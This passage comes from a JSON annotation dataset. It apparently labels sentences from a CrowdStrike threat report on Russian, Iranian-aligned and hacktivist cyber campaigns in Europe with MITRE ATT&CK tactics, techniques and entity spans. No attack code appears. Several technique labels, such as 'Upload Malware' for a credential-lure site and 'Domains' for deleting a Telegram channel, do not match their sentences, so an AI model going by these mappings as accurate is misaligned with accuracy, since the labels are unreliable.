Western support for Ukraine", "entities": [ { "text": "pro-Russia hacktivist CARR", "start": 17, "end": 43, "label": "ThreatActor" }, { "text": " claimed", "start": 43, "end": 51, "label": "Action" }, { "text": "DDoS campaigns", "start": 79, "end": 93, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s153-a8aa1e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 153, "context_before": "Throughout 2024, pro-Russia hacktivist CARR claimed to have conducted numerous DDoS campaigns against European entities in retaliation for Western military and financial support for Ukraine.", "sentence_text": "In December 2024, CARR deleted their public Telegram channel and announced that group members would continue to conduct DDoS attacks under the Z-Alliance moniker.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "delete Telegram channel; continue DDoS attacks under Z-Alliance moniker", "entities": [ { "text": "CARR", "start": 18, "end": 22, "label": "ThreatActor" }, { "text": "deleted", "start": 23, "end": 30, "label": "Action" }, { "text": "announced", "start": 65, "end": 74, "label": "Action" }, { "text": " Z-Alliance moniker", "start": 142, "end": 161, "label": "ThreatActor" }, { "text": " DDoS attacks", "start": 119, "end": 132, "label": "Action" }, { "text": "Telegram channel ", "start": 44, "end": 61, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s154-877ddc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 154, "context_before": "In December 2024, CARR deleted their public Telegram channel and announced that group members would continue to conduct DDoS attacks under the Z-Alliance moniker.", "sentence_text": "In January 2024, pro-IRGC hacktivist group FattahhCyberTeam defaced a Dutch manufacturing website with FattahhCyberTeam pro-Houthi messaging.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1491.001", "name": "Internal Defacement" } ], "procedure": "deface Dutch manufacturing website with pro-Houthi messaging", "entities": [ { "text": "pro-IRGC hacktivist group FattahhCyberTeam", "start": 17, "end": 59, "label": "ThreatActor" }, { "text": "defaced ", "start": 60, "end": 68, "label": "Action" }, { "text": "Dutch manufacturing website ", "start": 70, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s155-5f8588", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 155, "context_before": "In January 2024, pro-IRGC hacktivist group FattahhCyberTeam defaced a Dutch manufacturing website with FattahhCyberTeam pro-Houthi messaging.", "sentence_text": "Although the hacktivist remains active through October 2025, this incident is the only (aka Fattahh) known instance in which they targeted Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s156-23c9fd", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 156, "context_before": "Although the hacktivist remains active through October 2025, this incident is the only (aka Fattahh) known instance in which they targeted Europe.", "sentence_text": "This activity was motivated by these countries’ perceived support for Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s157-3e495c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 157, "context_before": "This activity was motivated by these countries’ perceived support for Israel.", "sentence_text": "From May 2025 to June 2025, pro-Palestine hacktivist group TunisianMaskersCyberForce conducted their #Dark_Pulse_V2 campaign targeting U.K.-based entities in response to the U.K.’s support for Israel in the Israel-Hamas conflict.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1499", "name": "Endpoint Denial of Service" } ], "procedure": "Conduct a coordinated cyber campaign targeting U.K.-based entities over a defined period.", "entities": [ { "text": "TunisianMaskersCyberForce", "start": 59, "end": 84, "label": "ThreatActor" }, { "text": "conducted their #Dark_Pulse_V2 campaign targeting U.K.-based entities", "start": 85, "end": 154, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s159-6ddd39", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 159, "context_before": "CyberForce", "sentence_text": "As part of this campaign, TunisianMaskersCyberForce threatened to leak emails from an unspecified government entity (possibly based in Europe) and data allegedly obtained from a previously targeted professional services entity.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "threaten to leak emails from government entity and data from professional services entity", "entities": [ { "text": "TunisianMaskersCyberForce", "start": 26, "end": 51, "label": "ThreatActor" }, { "text": " threatened", "start": 51, "end": 62, "label": "Action" }, { "text": "leak emails", "start": 66, "end": 77, "label": "Action" }, { "text": "targeted", "start": 189, "end": 197, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p25-s160-dbeda7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 25, "sentence_id": 160, "context_before": "As part of this campaign, TunisianMaskersCyberForce threatened to leak emails from an unspecified government entity (possibly based in Europe) and data allegedly obtained from a previously targeted professional services entity.", "sentence_text": "This assessment is made with high confidence based on observed hacktivist activity in response to global conflicts since at least 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p26-s161-f17c1c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 26, "sentence_id": 161, "context_before": "This assessment is made with high confidence based on observed hacktivist activity in response to global conflicts since at least 2022.", "sentence_text": "Non-Conflict-Driven Nation-State\nCyber Activity\nThough major conflicts have altered the targeting priorities and operational tempo of some nation-state adversaries, the underlying drivers of cyber espionage remain constant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p26-s162-3661ac", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 26, "sentence_id": 162, "context_before": "Non-Conflict-Driven Nation-State\nCyber Activity\nThough major conflicts have altered the targeting priorities and operational tempo of some nation-state adversaries, the underlying drivers of cyber espionage remain constant.", "sentence_text": "RUSSIA-ALIGNED ACTIVITY\nThough most Russia-nexus nation-state adversaries and threat actors are focusing on targeting Ukraine, strategic targeting of other European states — particularly NATO member countries — remains a priority.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p26-s163-5ad2bc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 26, "sentence_id": 163, "context_before": "RUSSIA-ALIGNED ACTIVITY\nThough most Russia-nexus nation-state adversaries and threat actors are focusing on targeting Ukraine, strategic targeting of other European states — particularly NATO member countries — remains a priority.", "sentence_text": "Russia-nexus adversaries’ intelligence collection targeting patterns across different sectors align with Russia's political and military objectives in Europe.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p26-s164-296d48", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 26, "sentence_id": 164, "context_before": "Russia-nexus adversaries’ intelligence collection targeting patterns across different sectors align with Russia's political and military objectives in Europe.", "sentence_text": "Targeting entities also highly likely enables Russia to gather political intelligence to exploit internal divisions that undermine European support for Ukraine and fracture the cohesion of NATO and the EU.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s165-76fed4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 165, "context_before": "Targeting entities also highly likely enables Russia to gather political intelligence to exploit internal divisions that undermine European support for Ukraine and fracture the cohesion of NATO and the EU.", "sentence_text": "Russia-aligned threat actors’ cyber operations against entities in non-NATO European countries likely serve distinct strategic goals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s166-695d1f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 166, "context_before": "Russia-aligned threat actors’ cyber operations against entities in non-NATO European countries likely serve distinct strategic goals.", "sentence_text": "For entities in Western-aligned countries, these intrusions likely primarily aim to collect intelligence and monitor relationships with the EU and NATO.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s167-336cc9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 167, "context_before": "For entities in Western-aligned countries, these intrusions likely primarily aim to collect intelligence and monitor relationships with the EU and NATO.", "sentence_text": "For countries actively seeking to integrate with these institutions, these threat actors likely intend to monitor and potentially disrupt their accession and reassert Russia's regional sphere of influence.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s168-4e9737", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 168, "context_before": "For countries actively seeking to integrate with these institutions, these threat actors likely intend to monitor and potentially disrupt their accession and reassert Russia's regional sphere of influence.", "sentence_text": "These operations demonstrate Russia’s integration of its intelligence collection and influence operations, focusing on NATO activities, energy relationships, and policy development.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s169-23abf9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 169, "context_before": "These operations demonstrate Russia’s integration of its intelligence collection and influence operations, focusing on NATO activities, energy relationships, and policy development.", "sentence_text": "The threat actors’ persistence and large volume of campaigns indicate Russia is allocating high-level resources to these campaigns and prioritizing European intelligence collection and influence operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s170-60ac11", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 170, "context_before": "The threat actors’ persistence and large volume of campaigns indicate Russia is allocating high-level resources to these campaigns and prioritizing European intelligence collection and influence operations.", "sentence_text": "Throughout 2024, the adversary exploited vulnerabilities and conducted malware campaigns likely targeting government entities in European nations including Poland, Moldova, the Czech Republic, Bulgaria, and Latvia.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "exploit vulnerabilities and conduct malware campaigns targeting government entities in European nations", "entities": [ { "text": "adversary", "start": 21, "end": 30, "label": "ThreatActor" }, { "text": " exploited", "start": 30, "end": 40, "label": "Action" }, { "text": "conducted malware campaigns", "start": 61, "end": 88, "label": "Action" }, { "text": "targeting", "start": 96, "end": 105, "label": "Action" }, { "text": " government entities", "start": 105, "end": 125, "label": "Infrastructure_Indicator" }, { "text": " European nations", "start": 128, "end": 145, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s171-cbc38c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 171, "context_before": "Throughout 2024, the adversary exploited vulnerabilities and conducted malware campaigns likely targeting government entities in European nations including Poland, Moldova, the Czech Republic, Bulgaria, and Latvia.", "sentence_text": "Throughout 2025, FANCY BEAR has continued to exploit vulnerabilities in webmail clients such as Zimbra, Roundcube, and MDaemon to capture authentication data as well as redirect and exfiltrate emails.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1114", "name": "Email Collection" } ], "procedure": "exploit vulnerabilities in Zimbra, Roundcube, and MDaemon webmail clients to capture authentication data and redirect/exfiltrate emails", "entities": [ { "text": "FANCY BEAR", "start": 17, "end": 27, "label": "ThreatActor" }, { "text": "exploit", "start": 45, "end": 52, "label": "Action" }, { "text": " webmail", "start": 71, "end": 79, "label": "Infrastructure_Indicator" }, { "text": "Zimbra", "start": 96, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "Roundcube", "start": 104, "end": 113, "label": "Infrastructure_Indicator" }, { "text": " MDaemon", "start": 118, "end": 126, "label": "Infrastructure_Indicator" }, { "text": " capture authentication data ", "start": 129, "end": 158, "label": "Action" }, { "text": " redirect", "start": 168, "end": 177, "label": "Action" }, { "text": "exfiltrate", "start": 182, "end": 192, "label": "Action" }, { "text": "emails", "start": 193, "end": 199, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s172-6f311d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 172, "context_before": "Throughout 2025, FANCY BEAR has continued to exploit vulnerabilities in webmail clients such as Zimbra, Roundcube, and MDaemon to capture authentication data as well as redirect and exfiltrate emails.", "sentence_text": "FANCY BEAR highly likely targeted Czech Republic government entities with NATO cooperation lures and exploited NTLM vulnerabilities against Romanian government entities, highlighting the adversary’s persistent intelligence collection goals.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "target Czech government with NATO lures; exploit NTLM vulnerabilities against Romanian government for intelligence collection", "entities": [ { "text": "FANCY BEAR ", "start": 0, "end": 11, "label": "ThreatActor" }, { "text": "targeted ", "start": 25, "end": 34, "label": "Action" }, { "text": "Czech Republic government entities ", "start": 34, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "NATO cooperation lures", "start": 74, "end": 96, "label": "MalwareTool" }, { "text": "exploited", "start": 101, "end": 110, "label": "Action" }, { "text": " NTLM", "start": 110, "end": 115, "label": "Infrastructure_Indicator" }, { "text": " Romanian government entities", "start": 139, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "adversary", "start": 187, "end": 196, "label": "ThreatActor" }, { "text": " intelligence collection ", "start": 209, "end": 234, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s173-3a459f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 173, "context_before": "FANCY BEAR highly likely targeted Czech Republic government entities with NATO cooperation lures and exploited NTLM vulnerabilities against Romanian government entities, highlighting the adversary’s persistent intelligence collection goals.", "sentence_text": "NATO member states and countries that have formal partnerships and cooperative agreements with NATO will remain a primary long-term target for FANCY BEAR’s future operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s174-6a0a0b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 174, "context_before": "NATO member states and countries that have formal partnerships and cooperative agreements with NATO will remain a primary long-term target for FANCY BEAR’s future operations.", "sentence_text": "Since October 2020, the Foreign Intelligence Service of the Russian Federation (SVR)-operated adversary COZY BEAR has continued their DiplomaticOrbiter campaign targeting European ministries of foreign affairs (MFAs) to collect intelligence consistent with the SVR's diplomatic and strategic intelligence objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s175-870a2f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 175, "context_before": "Since October 2020, the Foreign Intelligence Service of the Russian Federation (SVR)-operated adversary COZY BEAR has continued their DiplomaticOrbiter campaign targeting European ministries of foreign affairs (MFAs) to collect intelligence consistent with the SVR's diplomatic and strategic intelligence objectives.", "sentence_text": "The adversary resumed operations in January 2025, in which they highly likely used spear-phishing emails to deliver their novel custom downloader BoomTwins.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "use spear-phishing emails to deliver BoomTwins downloader", "entities": [ { "text": "The adversary", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "deliver ", "start": 108, "end": 116, "label": "Action" }, { "text": " BoomTwins", "start": 145, "end": 155, "label": "MalwareTool" }, { "text": "spear-phishing emails ", "start": 83, "end": 105, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s176-aac1eb", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 176, "context_before": "The adversary resumed operations in January 2025, in which they highly likely used spear-phishing emails to deliver their novel custom downloader BoomTwins.", "sentence_text": "In October 2024, COZY BEAR likely targeted European government entities during a separate large-scale phishing campaign.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "target European government entities in large-scale phishing campaign", "entities": [ { "text": "COZY BEAR ", "start": 17, "end": 27, "label": "ThreatActor" }, { "text": "targeted ", "start": 34, "end": 43, "label": "Action" }, { "text": "European government entities", "start": 43, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "phishing campaign", "start": 102, "end": 119, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s177-8e7e27", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 177, "context_before": "In October 2024, COZY BEAR likely targeted European government entities during a separate large-scale phishing campaign.", "sentence_text": "Between 2023 and 2025, VENOMOUS BEAR deployed their CoreTech implant and KazuarRAT in campaigns against multiple Eastern European government entities, including those in Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "deploy CoreTech implant and KazuarRAT against Eastern European government entities including Ukraine", "entities": [ { "text": "VENOMOUS BEAR ", "start": 23, "end": 37, "label": "ThreatActor" }, { "text": "deployed", "start": 37, "end": 45, "label": "Action" }, { "text": " CoreTech implant", "start": 51, "end": 68, "label": "MalwareTool" }, { "text": "KazuarRAT", "start": 73, "end": 82, "label": "MalwareTool" }, { "text": "multiple Eastern European government entities,", "start": 104, "end": 150, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p27-s178-debc1b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 27, "sentence_id": 178, "context_before": "Between 2023 and 2025, VENOMOUS BEAR deployed their CoreTech implant and KazuarRAT in campaigns against multiple Eastern European government entities, including those in Ukraine.", "sentence_text": "However, CrowdStrike Intelligence assesses with moderate confidence that VENOMOUS BEAR has targeted and will continue to target Eastern European government entities — likely due to the adversary’s routine intelligence collection requirements, which were established alongside their intelligence collection capabilities prior to February 2022.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s179-74de0a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 179, "context_before": "However, CrowdStrike Intelligence assesses with moderate confidence that VENOMOUS BEAR has targeted and will continue to target Eastern European government entities — likely due to the adversary’s routine intelligence collection requirements, which were established alongside their intelligence collection capabilities prior to February 2022.", "sentence_text": "Throughout 2024 and 2025, Russia-aligned activity cluster RepeatingUmbra has targeted individuals and entities in Eastern Europe via sustained credential phishing and malware campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "target individuals/entities in Eastern Europe via credential phishing and malware campaigns", "entities": [ { "text": " RepeatingUmbra ", "start": 57, "end": 73, "label": "ThreatActor" }, { "text": "targeted", "start": 77, "end": 85, "label": "Action" }, { "text": " individuals and entities in Eastern Europe", "start": 85, "end": 128, "label": "Infrastructure_Indicator" }, { "text": " credential phishing", "start": 142, "end": 162, "label": "Action" }, { "text": " malware campaigns", "start": 166, "end": 184, "label": "Action" }, { "text": "Russia-aligned activity cluster", "start": 26, "end": 57, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s180-cece4f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 180, "context_before": "Throughout 2024 and 2025, Russia-aligned activity cluster RepeatingUmbra has targeted individuals and entities in Eastern Europe via sustained credential phishing and malware campaigns.", "sentence_text": "The activity cluster conducted extensive credential phishing operations against Polish, Lithuanian, Latvian, and Ukrainian individuals and public entities as well as Russian-speaking individuals.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "conduct credential phishing operations against Polish, Lithuanian, Latvian, Ukrainian individuals and public entities, and Russian-speaking individuals", "entities": [ { "text": " activity cluster", "start": 3, "end": 20, "label": "ThreatActor" }, { "text": "conducted ", "start": 21, "end": 31, "label": "Action" }, { "text": "credential phishing", "start": 41, "end": 60, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s181-0d603d", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 181, "context_before": "The activity cluster conducted extensive credential phishing operations against Polish, Lithuanian, Latvian, and Ukrainian individuals and public entities as well as Russian-speaking individuals.", "sentence_text": "RepeatingUmbra highly likely continues to collect intelligence while conducting IO — such as compromising politicians’ social media accounts and laundering stolen data through hacktivist groups — to destabilize Eastern European countries.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1657", "name": "Financial Theft" } ], "procedure": "collect intelligence; conduct IO by compromising social media accounts and laundering data through hacktivist groups to destabilize countries", "entities": [ { "text": "RepeatingUmbra", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "collect intelligence", "start": 42, "end": 62, "label": "Action" }, { "text": "conducting IO ", "start": 69, "end": 83, "label": "Action" }, { "text": " compromising", "start": 92, "end": 105, "label": "Action" }, { "text": " politicians’ social media accounts", "start": 105, "end": 140, "label": "Infrastructure_Indicator" }, { "text": " hacktivist groups", "start": 175, "end": 193, "label": "ThreatActor" }, { "text": "laundering ", "start": 145, "end": 156, "label": "Action" }, { "text": "stolen data", "start": 156, "end": 167, "label": "Infrastructure_Indicator" }, { "text": "Eastern European countries", "start": 211, "end": 237, "label": "Infrastructure_Indicator" }, { "text": " destabilize ", "start": 198, "end": 211, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s182-59a6de", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 182, "context_before": "RepeatingUmbra highly likely continues to collect intelligence while conducting IO — such as compromising politicians’ social media accounts and laundering stolen data through hacktivist groups — to destabilize Eastern European countries.", "sentence_text": "In August 2025 and September 2025, a likely Russia-nexus eCrime threat actor conducted WhatsApp phishing campaigns targeting entities and individuals in Moldova, including a likely Moldovan Armed Forces member.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "conduct WhatsApp phishing campaigns targeting entities/individuals in Moldova including Armed Forces member", "entities": [ { "text": "Russia-nexus eCrime threat actor", "start": 44, "end": 76, "label": "ThreatActor" }, { "text": "WhatsApp", "start": 87, "end": 95, "label": "Infrastructure_Indicator" }, { "text": " phishing ", "start": 95, "end": 105, "label": "Action" }, { "text": "targeting", "start": 115, "end": 124, "label": "Action" }, { "text": " Moldovan Armed Forces member", "start": 180, "end": 209, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s183-dc6f12", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 183, "context_before": "In August 2025 and September 2025, a likely Russia-nexus eCrime threat actor conducted WhatsApp phishing campaigns targeting entities and individuals in Moldova, including a likely Moldovan Armed Forces member.", "sentence_text": "The threat actor abused device-linking features to access victims’ WhatsApp accounts.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.001", "name": "Additional Cloud Credentials" } ], "procedure": "abuse device-linking features to access victims' WhatsApp accounts", "entities": [ { "text": " threat actor ", "start": 3, "end": 17, "label": "ThreatActor" }, { "text": "abused ", "start": 17, "end": 24, "label": "Action" }, { "text": "access", "start": 51, "end": 57, "label": "Action" }, { "text": "victims’ WhatsApp accounts", "start": 58, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "device-linking features", "start": 24, "end": 47, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s184-9789cc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 184, "context_before": "The threat actor abused device-linking features to access victims’ WhatsApp accounts.", "sentence_text": "In September 2025, the threat actor reportedly used the Signal messaging application to distribute a link that led to a malicious website spoofing a legitimate Moldovan economic manifesto petition.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.002", "name": "Spearphishing Link" } ], "procedure": "use Signal to distribute link to malicious website spoofing Moldovan petition", "entities": [ { "text": " threat actor", "start": 22, "end": 35, "label": "ThreatActor" }, { "text": "Signal messaging application", "start": 56, "end": 84, "label": "Infrastructure_Indicator" }, { "text": "distribute", "start": 88, "end": 98, "label": "Action" }, { "text": " link", "start": 100, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "spoofing", "start": 138, "end": 146, "label": "Action" }, { "text": "malicious website", "start": 120, "end": 137, "label": "Infrastructure_Indicator" }, { "text": "Moldovan economic manifesto petition", "start": 160, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s185-92dad4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 185, "context_before": "In September 2025, the threat actor reportedly used the Signal messaging application to distribute a link that led to a malicious website spoofing a legitimate Moldovan economic manifesto petition.", "sentence_text": "The website enticed targets to sign in to WhatsApp to “prevent electoral fraud.”", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "Use a malicious website to entice targets to sign in to WhatsApp.", "entities": [ { "text": "enticed targets to sign in to WhatsApp", "start": 12, "end": 50, "label": "Action" }, { "text": "WhatsApp", "start": 42, "end": 50, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s186-a9cb23", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 186, "context_before": "The website enticed targets to sign in to WhatsApp to “prevent electoral fraud.”", "sentence_text": "Also in September 2025, another likely Russia-nexus eCrime threat actor leveraged opportunistically compromised Zimbra Collaboration servers to collect nonprofit, political, and logistics entities located in Europe, particularly those in Moldova.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "leverage compromised Zimbra servers to collect nonprofit, political, and logistics entities in Europe/Moldova", "entities": [ { "text": " Russia-nexus eCrime threat actor ", "start": 38, "end": 72, "label": "ThreatActor" }, { "text": "leveraged", "start": 72, "end": 81, "label": "Action" }, { "text": "compromised Zimbra Collaboration servers", "start": 100, "end": 140, "label": "Infrastructure_Indicator" }, { "text": "collect", "start": 144, "end": 151, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s187-97c83e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 187, "context_before": "Also in September 2025, another likely Russia-nexus eCrime threat actor leveraged opportunistically compromised Zimbra Collaboration servers to collect nonprofit, political, and logistics entities located in Europe, particularly those in Moldova.", "sentence_text": "European Defense Sector Targeting In October 2024, COZY BEAR leveraged domain spoofing — using domains registered since at least August 2024 — to likely target an international defense organization as well as European and North American government and private entities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1584.001", "name": "Domains" } ], "procedure": "use domain spoofing to target defense organization and government/private entities in Europe and North America", "entities": [ { "text": "COZY BEAR", "start": 51, "end": 60, "label": "ThreatActor" }, { "text": " leveraged", "start": 60, "end": 70, "label": "Action" }, { "text": "domain spoofing", "start": 71, "end": 86, "label": "Action" }, { "text": " using domains", "start": 88, "end": 102, "label": "Action" }, { "text": "target", "start": 153, "end": 159, "label": "Action" }, { "text": "international defense organization", "start": 163, "end": 197, "label": "Infrastructure_Indicator" }, { "text": "European and North American government and private entities", "start": 209, "end": 268, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s188-6f80c5", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 188, "context_before": "European Defense Sector Targeting In October 2024, COZY BEAR leveraged domain spoofing — using domains registered since at least August 2024 — to likely target an international defense organization as well as European and North American government and private entities.", "sentence_text": "Additionally, in July 2025, U.K. government sanctions against GRU Unit 26165 operators alleged that the group had accessed private IP cameras near military facilities, ports, border crossings, and other transportation infrastructure across several European countries, including Moldova.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "access private IP cameras near military facilities, ports, borders, and transportation infrastructure in European countries", "entities": [ { "text": " the group ", "start": 99, "end": 110, "label": "ThreatActor" }, { "text": " GRU Unit 26165 operators ", "start": 61, "end": 87, "label": "ThreatActor" }, { "text": " accessed", "start": 113, "end": 122, "label": "Action" }, { "text": "private IP cameras", "start": 123, "end": 141, "label": "Infrastructure_Indicator" }, { "text": " transportation infrastructure", "start": 202, "end": 232, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p28-s189-22bb45", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 28, "sentence_id": 189, "context_before": "Additionally, in July 2025, U.K. government sanctions against GRU Unit 26165 operators alleged that the group had accessed private IP cameras near military facilities, ports, border crossings, and other transportation infrastructure across several European countries, including Moldova.", "sentence_text": "This highlights 